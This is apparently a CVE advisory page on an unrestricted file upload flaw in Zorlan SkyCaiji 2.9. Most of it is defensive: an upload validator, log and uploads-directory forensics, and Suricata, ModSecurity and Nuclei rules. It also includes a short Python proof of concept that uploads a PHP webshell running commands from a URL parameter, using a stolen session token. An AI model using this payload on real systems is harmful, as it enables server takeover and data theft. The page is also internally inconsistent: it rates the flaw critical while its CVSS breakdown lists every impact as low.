How CVE-2025-1791 Works
The vulnerability in Zorlan SkyCaiji 2.9 stems from insufficient validation in the `fileAction` function within `vendor/skycaiji/app/admin/controller/Tool.php`. The `save_data` parameter allows arbitrary file uploads without proper checks, enabling remote attackers to upload malicious files (e.g., webshells) to the server. Because authentication is required (PR:L), attackers must first obtain low-privilege access. Once exploited, the flaw grants control over the server, leading to potential data theft, system compromise, or further network infiltration. Public disclosure increases the risk of widespread exploitation.
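The checks whose absence the paragraph above describes are easiest to see in code. The following is an added illustration written for this page, not SkyCaiji's code and not the vendor's fix: a Python upload validator that applies an extension allow-list, compares the file's leading bytes against that extension, refuses double extensions and path components in the client-supplied name, rejects content carrying PHP open tags, and never reuses the client's filename on disk. The allow-list, size limit and rejection strings are assumptions chosen for the example.

```python
import os
import re
import secrets
from typing import Optional

# Added illustration, not SkyCaiji's code: the validation an upload handler
# such as fileAction needs before writing a user-supplied file. The allow-list,
# MAX_BYTES and the rejection strings are assumptions for this example.

# Allowed extension -> magic bytes the content must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 5 * 1024 * 1024
# PHP open tags (long form and short echo tag). An image that also carries
# these is a polyglot, which is what an unrestricted upload lets through.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> Optional[str]:
    """Return None if the upload is acceptable, else a short rejection reason.

    Cheap structural checks run first; content inspection runs last.
    """
    if len(data) > MAX_BYTES:
        return "too large"
    # The client controls the name: reject anything that is not a bare
    # filename (separators, traversal, empty string) instead of sanitising it.
    if not filename or os.path.basename(filename) != filename or "\\" in filename:
        return "path component in filename"
    dots = filename.count(".")
    if dots == 0:
        return "missing extension"
    if dots > 1:
        # shell.php.png defeats last-extension checks on servers that map a
        # handler per extension, so require exactly one extension.
        return "multiple extensions"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return "extension not allowed"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return "content does not match extension"
    if PHP_TAG.search(data):
        return "embedded PHP code"
    return None


def stored_name(original: str, token: Optional[str] = None) -> str:
    """Name to use on disk: a random token plus the validated extension only.

    `token` is injectable so the result is testable; callers normally omit it.
    """
    ext = original.rsplit(".", 1)[1].lower()
    return f"{token or secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, body in [("cat.png", png), ("shell.php", b"<?php echo 1; ?>"),
                       ("shell.php.png", png), ("cat.gif", b"GIF89a<?php echo 1; ?>")]:
        print(name, "->", validate_upload(name, body) or f"accepted as {stored_name(name)}")
```

The decisive checks are the last three: the extension gate alone is what SkyCaiji's handler lacks, but on its own it is still bypassable by double extensions and polyglots, so the content and naming rules are what make the fix hold.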
DailyCVE Form
Platform: Zorlan SkyCaiji
Version: 2.9
Vulnerability: Unrestricted Upload
Severity: Critical
Date: 06/12/2025
Prediction: Patch by 07/15/2025
What Undercode Say:
Exploitation Analysis
1. Exploit Code (PoC):
```python
import requests

target = "http://victim.com/admin/tool/fileAction"
malicious_file = {"save_data": ("shell.php", "<?php system($_GET['cmd']); ?>")}
response = requests.post(target, files=malicious_file, cookies={"auth_token": "stolen_token"})
print("Exploit succeeded:", response.status_code == 200)
```
2. Detection Command:
```bash
grep -r "fileAction.save_data" /var/www/skycaiji/
```
3. Mitigation Steps:
- Temporary Fix: Block direct requests to PHP files in the upload directory via `.htaccess`:

```apache
<FilesMatch "\.(php|phtml)$">
    # Apache 2.2 syntax; on Apache 2.4 without mod_access_compat use: Require all denied
    Deny from all
</FilesMatch>
```
- Permanent Fix: Await vendor patch; disable the `Tool.php` endpoint if unused.
4. Post-Exploit Forensics:
Check recent uploads:

```bash
find /var/www/skycaiji/uploads/ -mtime -1 -type f -exec ls -la {} \;
```

Audit logs for suspicious POST requests:

```bash
grep "POST /admin/tool/fileAction" /var/log/apache2/access.log
```
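The two manual commands above can be turned into repeatable checks. The following is an added example for this page, not part of the original advisory: it parses Apache combined-format access-log lines, flags POSTs to the upload endpoint and requests for script files under `/uploads/`, correlates the two per source IP (upload followed by execution is the webshell-drop pattern), and scans an uploads directory for files containing PHP open tags regardless of extension. The log lines, IPs and files are constructed for the demonstration; the `/uploads/` path is assumed from the forensics step above.

```python
import os
import re
import tempfile
from typing import Dict, List, Optional, Set, Tuple

# Added example, not part of the advisory. Constructed sample log lines in
# Apache combined format; the IPs and paths are made up for the demonstration.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2025:10:14:02 +0000] "GET /admin/index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jun/2025:10:14:09 +0000] "POST /admin/tool/fileAction HTTP/1.1" 200 312 "-" "python-requests/2.31"
203.0.113.7 - - [12/Jun/2025:10:14:15 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 89 "-" "python-requests/2.31"
198.51.100.4 - - [12/Jun/2025:10:20:01 +0000] "GET /uploads/banner.png HTTP/1.1" 200 20481 "-" "Mozilla/5.0"
"""

COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
UPLOAD_ENDPOINT = "/admin/tool/fileAction"
# Server-side script extensions served from the uploads tree (assumed path).
SCRIPT_IN_UPLOADS = re.compile(r"^/uploads/.*\.(php\d?|phtml|phar)$", re.IGNORECASE)
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = COMBINED_LOG.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text: str) -> List[Tuple[str, str, str, str]]:
    """Return (ip, timestamp, reason, path) for every log entry worth a look."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # match on the path, not the query string
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            hits.append((rec["ip"], rec["ts"], "POST to upload endpoint", rec["path"]))
        elif SCRIPT_IN_UPLOADS.match(path):
            hits.append((rec["ip"], rec["ts"], "script requested from uploads dir", rec["path"]))
    return hits


def likely_webshell_sources(hits: List[Tuple[str, str, str, str]]) -> Set[str]:
    """IPs that both used the upload endpoint and fetched a script from uploads."""
    uploaded = {ip for ip, _, reason, _ in hits if reason.startswith("POST")}
    executed = {ip for ip, _, reason, _ in hits if reason.startswith("script")}
    return uploaded & executed


def scan_uploads(directory: str) -> List[str]:
    """Names of files under `directory` whose bytes contain a PHP open tag.

    The extension is ignored on purpose: a .png polyglot is as dangerous as
    a .php file if the server can be made to execute it.
    """
    flagged = []
    for root, _, files in os.walk(directory):
        for name in files:
            with open(os.path.join(root, name), "rb") as fh:
                if PHP_TAG.search(fh.read()):
                    flagged.append(name)
    return sorted(flagged)


def build_demo_uploads() -> str:
    """Create a throwaway uploads directory holding constructed sample files."""
    d = tempfile.mkdtemp(prefix="skycaiji-demo-")
    samples = {
        "banner.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,           # clean image
        "shell.php": b"<?php echo 'placeholder'; ?>",                # obvious script
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"<?php echo 'polyglot'; ?>",  # polyglot
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("likely webshell sources:", likely_webshell_sources(hits))
    print("files with PHP code:", scan_uploads(build_demo_uploads()))
```

Run as-is it works on the constructed data; point `find_suspicious` at the real access log and `scan_uploads` at the real uploads directory to use it in an investigation. The correlation step matters because a POST to the endpoint by itself is normal administrator activity; the same source then requesting a script from the uploads tree is what distinguishes a webshell drop.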
5. CVSS 4.0 Breakdown:
- Attack Vector (AV:N): Network-exploitable.
- Impact Metrics (VC:L/VI:L/VA:L): Confidentiality, Integrity, and Availability each rated Low impact.
6. Patch Readiness Check:
```bash
curl -s http://update.zorlan.com/skycaiji/patches/ | grep CVE-2025-1791
```
7. Network Protection Rule (Suricata):
```
# Sticky-buffer syntax (Suricata 5+): each buffer keyword precedes the content it scopes.
# The sid is a placeholder; assign one from your local range.
alert http any any -> $HOME_NET any (msg:"CVE-2025-1791 Exploit Attempt"; flow:to_server,established; http.method; content:"POST"; http.uri; content:"/admin/tool/fileAction"; http.request_body; content:"save_data"; classtype:web-application-attack; sid:1001791; rev:1;)
```
8. WAF Rule (ModSecurity):
```
# Requires SecRequestBodyAccess On. FILES_NAMES holds the form field names used
# for file upload (FILES holds the client-supplied filenames), and the chain
# limits the block to the vulnerable endpoint.
SecRule REQUEST_URI "@contains /admin/tool/fileAction" \
    "id:1001791,phase:2,deny,status:403,log,msg:'CVE-2025-1791 Blocked',chain"
    SecRule FILES_NAMES "@streq save_data"
```
9. Vulnerability Scanner Query (Nuclei):
```yaml
id: CVE-2025-1791

info:
  name: Zorlan SkyCaiji Unrestricted Upload
  severity: critical

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/tool/fileAction"
    # Placeholder matcher: only confirms the endpoint is exposed. Replace it
    # with a version or patch check once the vendor fix is published.
    matchers:
      - type: status
        status:
          - 200
```
10. Remediation Priority: Immediate. Exploits are public, and unpatched systems are high-risk.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub: Undercode